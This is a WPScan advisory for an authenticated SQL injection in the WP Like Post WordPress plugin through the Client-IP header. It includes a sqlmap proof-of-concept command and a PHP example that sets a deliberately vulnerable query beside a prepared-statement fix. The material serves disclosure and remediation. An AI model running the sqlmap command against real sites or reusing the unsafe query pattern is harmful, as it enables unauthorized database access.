WP Like Post <= 1.5.2 - Authenticated SQL Injection

Description
SQL can be injected through several inputs (the Client-IP request header, for example) when the [gs_lp_like_post] shortcode is used. An authenticated account is required, but a low-privileged one is sufficient; subscriber is enough.

Found by: Paul Dannewitz

Other vulnerabilities submitted to wpvulndb: https://wpvulndb.com/search?utf8=%E2%9C%93&text=Paul+Dannewitz

Proof of Concept
./sqlmap.py -u "http://wordpress.app/wp-admin/admin-ajax.php" --cookie="[insert cookie of a wordpress account, even if it's just a subscriber]" --data="action=parse-media-shortcode&shortcode=[gs_lp_like_post post_id=\"1\"]" -H "Client-IP: 127.0.0.1*" --level 5 --dbms=mysql
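
The coding pattern behind this class of bug, next to its fix, as an added example (not the plugin's source and not part of the original advisory): the Client-IP header is client-controlled, so it has to be validated and bound as a parameter rather than concatenated into the statement. The table name gs_lp_likes and the example_* function names are hypothetical; $wpdb->prepare(), $wpdb->get_var() and filter_var() are the standard WordPress and PHP calls.

```php
<?php
// Added illustration: NOT the WP Like Post source. The table name
// "gs_lp_likes" and all example_* function names are assumptions.

/**
 * Return a syntactically valid client address. Client-IP is a request
 * header the client sets freely, so it is accepted only when it parses as
 * an IP literal; otherwise fall back to the socket peer address.
 * Validation constrains the syntax only: the header remains spoofable.
 */
function example_client_ip(array $server): string {
    $candidate = trim((string) ($server['HTTP_CLIENT_IP'] ?? ''));
    if ($candidate !== '' && filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
        return $candidate;
    }
    $peer = (string) ($server['REMOTE_ADDR'] ?? '');
    return filter_var($peer, FILTER_VALIDATE_IP) !== false ? $peer : '0.0.0.0';
}

/** Vulnerable pattern: raw header text is concatenated into the SQL. */
function example_has_liked_unsafe($wpdb, int $post_id): bool {
    $ip  = $_SERVER['HTTP_CLIENT_IP'] ?? $_SERVER['REMOTE_ADDR'];
    $sql = "SELECT COUNT(*) FROM {$wpdb->prefix}gs_lp_likes
            WHERE post_id = $post_id AND ip = '$ip'";
    return (int) $wpdb->get_var($sql) > 0;
}

/** Hardened pattern: validated input plus a prepared statement. */
function example_has_liked_safe($wpdb, int $post_id): bool {
    $ip  = example_client_ip($_SERVER);
    // %d and %s placeholders make $wpdb escape and quote each value, so the
    // header content can never change the structure of the statement.
    $sql = $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->prefix}gs_lp_likes
         WHERE post_id = %d AND ip = %s",
        $post_id,
        $ip
    );
    return (int) $wpdb->get_var($sql) > 0;
}
```

Either control alone closes this input; applying both keeps the query safe if another caller later passes an unvalidated value.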

Affects Plugin

References

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Paul Dannewitz
Submitter Twitter padannewitz
Views 10
Verified No
WPVDB ID 8903

Timeline

Publicly Published 2017-08-25
Added 2017-09-20
Last Updated 2017-09-20

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.